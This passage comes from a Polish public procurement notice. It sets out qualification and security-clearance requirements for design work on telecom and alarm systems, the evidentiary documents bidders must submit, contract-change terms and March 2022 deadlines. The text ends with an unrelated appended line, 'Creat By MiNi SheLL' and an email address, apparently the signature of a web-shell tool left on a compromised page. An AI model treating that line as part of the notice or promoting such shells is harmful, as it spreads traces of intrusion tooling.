pomiarów<br/>wysokościowych, realizacyjnych inwentaryzacyjnych<br/>w dziedzinie geodezji i kartografii, posiadającą świadectwo nadania uprawnień zawodowych w dziedzinie geodezji i<br/>kartografii w zakresie geodezyjnych pomiarów wysokościowych, realizacyjnych i inwentaryzacyjnych (zakres nr 1), zgodnie z<br/>art. 43, pkt. 1 ustawy Prawo geodezyjne i kartograficzne;<br/>e) 2 (dwie) osoby – które będą brały udział w realizacji przedmiotowego zamówienia wykonując dokumentację w zakresie<br/>sieci teleinformatycznej i systemów alarmowych, posiadające poświadczenie bezpieczeństwa osobowego uprawniające do<br/>dostępu do informacji niejawnych o klauzuli co najmniej „ZASTRZEŻONE” lub pisemne upoważnienia uprawniające do<br/>dostępu do takich informacji, wydane przez kierownika jednostki organizacyjnej wraz z aktualnymi zaświadczeniami o<br/>odbyciu szkolenia<br/>w zakresie ochrony informacji niejawnych.<br/>UWAGA I:<br/>Zamawiający dopuszcza możliwość posiadania wymaganych uprawnień przez 1 osobę w kilku specjalnościach. Tzn.<br/>warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie zamówienia wykaże, że np. dysponuje<br/>1 osobą, która posiada uprawnienia do projektowania w zakresie specjalności instalacyjnej sieci, instalacji i urządzeń<br/>sanitarnych oraz jednocześnie posiada uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych, a także posiada uprawnienia zawodowe do wykonywania dokumentacji projektowej w zakresie sieci teleinformatycznych i systemów alarmowych.<br/>UWAGA II:<br/>Osoby, które będą uczestniczyć w wykonaniu zamówienia w zakresie sieci teleinformatycznej i systemów alarmowych<br/>muszą posiadać aktualne poświadczenie bezpieczeństwa osobowego uprawniające do dostępu do informacji niejawnych o<br/>klauzuli co najmniej „ZASTRZEŻONE” lub pisemne upoważnienie uprawniające do dostępu do takich informacji, wydane<br/>przez kierownika jednostki organizacyjnej oraz aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji<br/>niejawnych.<br/>UWAGA III:<br/>Zgodnie z art. 182 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych poświadczenia bezpieczeństwa wydane<br/>na podstawie przepisów zawartych w Ustawie z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych zachowują<br/>ważność przez okres wskazany w tych przepisach.<br/>Na podstawie z art. 19 ust. 2 pkt 3 ustawy o ochronie informacji niejawnych to pełnomocnik ochrony Wykonawcy organizuje<br/>szkolenie dla osób zatrudnionych w jednostce organizacyjnej. Określenie „organizacja szkolenia” oznacza, iż pełnomocnik<br/>ochrony nie zawsze musi samodzielnie, bezpośrednio przeprowadzać szkolenie, w szczególności w przypadku jednostek<br/>organizacyjnych o rozbudowanej strukturze. Jednakże zawsze jest zobligowany do osobistego wystawienia i podpisania<br/>zaświadczeń o przeszkoleniu. Zamawiający dopuszcza również wystawianie i podpisywanie zaświadczeń o przeszkoleniu<br/>przez zastępcę pełnomocnika jeżeli taki funkcjonuje w strukturze jednostki organizacyjnej.<br/>UWAGA IV:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór<br/>oświadczenia stanowi załącznik nr 7 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie<br/>Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, następujących<br/>podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1) odpisu lub informacji z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, w celu<br/>potwierdzenia braku podstaw wykluczenia na<br/>podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>2) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3 ustawy, b) art.<br/>108 ust. 1 pkt 4 ustawy,<br/>dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego, c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6 ustawy, e) art. 109 ust.<br/>1 pkt 5, 7 i 8 ustawy. Wzór oświadczenia stanowi załącznik nr 3 do SWZ;<br/>UWAGA:<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia (Konsorcjum, spółka cywilna), dokumenty, o których mowa w ust. 1 składane<br/>będą przez każdego partnera konsorcjum/ wspólnika spółki cywilnej.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast odpisu albo informacji<br/>z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w ust. 1 pkt 1)<br/>– składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>3. Dokumenty, o których mowa w ust. 2 powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni<br/>terminie następujących podmiotowych środków dowodowych potwierdzających spełnienie warunków udziału w postępowaniu, tj.:<br/>1) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych<br/>są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór Wykazu stanowi Załącznik<br/>nr 4 do SWZ.<br/><br/>3) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór Wykazu stanowi Załącznik nr<br/>5 do SWZ.<br/>4) wykaz osób, skierowanych do realizacji przedmiotowego zamówienia wykonujących dokumentację w zakresie sieci<br/>teleinformatycznej i systemów alarmowych, posiadających poświadczenie bezpieczeństwa osobowego uprawniające do dostępu do<br/>informacji niejawnych o klauzuli co najmniej „ZASTRZEŻONE” lub pisemne upoważnienia uprawniające do dostępu do takich<br/>informacji, wydane przez kierownika jednostki organizacyjnej wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzór Wykazu stanowi Załącznik nr 5A do SWZ.<br/>5) oświadczenie o posiadaniu (dysponowaniu) systemu teleinformatycznego, spełniającego wszystkie warunki wynikające z zapisów<br/>art. 48 ust. 9 Ustawy o ochronie informacji niejawnych. Wzór oświadczenia stanowi Załącznik nr 10 do SWZ.<br/>UWAGA:<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna),<br/>wystarczającym jest, aby dokumenty, o których mowa w ust. 3 złożone zostały przez jednego z partnera konsorcjum/ wspólnika<br/>spółki cywilnej, który spełnia warunki udziału w postępowaniu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje (zastrzega sobie) możliwość wprowadzenia zmian w umowie, tj.:<br/>a) Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac<br/>projektowych. W takim przypadku termin wykonania przedmiotu zamówienia zostanie przesunięty o ilość dni równą<br/>okresowi wstrzymania prac;<br/>b) nastąpi zmiana obowiązującej stawki podatku VAT. W takim przypadku cena przedmiotu zamówienia może zostać odpowiednio zmieniona;<br/>c) zaistnieją przyczyny niezależne od działania Stron umowy, których przy zachowaniu wszelkich należnych środków nie<br/>można uniknąć ani im zapobiec w szczególności protesty mieszkańców lub innych osób prawnych lub fizycznych. W takiej<br/>sytuacji termin wykonania przedmiotu zamówienia zostanie przesunięty o uzasadnioną okolicznościami ilość dni ustaloną<br/>przez Strony umowy.<br/>d) możliwość dokonania zmian umowy w razie zaistnienia okoliczności określonych w art. 15 r ustawy z dnia 2 marca 2020<br/>r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób<br/>zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. z 2020 poz. 1842, z późn.zm.), przy zachowaniu określonych<br/>w tym przepisie obowiązków.<br/>e) możliwość wprowadzenia zmian w umowie w przypadkach określonych w art. 455 ustawy z dnia 11 września 2019 r. – Prawo Zamówień Publicznych. Udział w wizji lokalnej możliwy będzie po wcześniejszym kontakcie telefonicznym <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/34wog/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com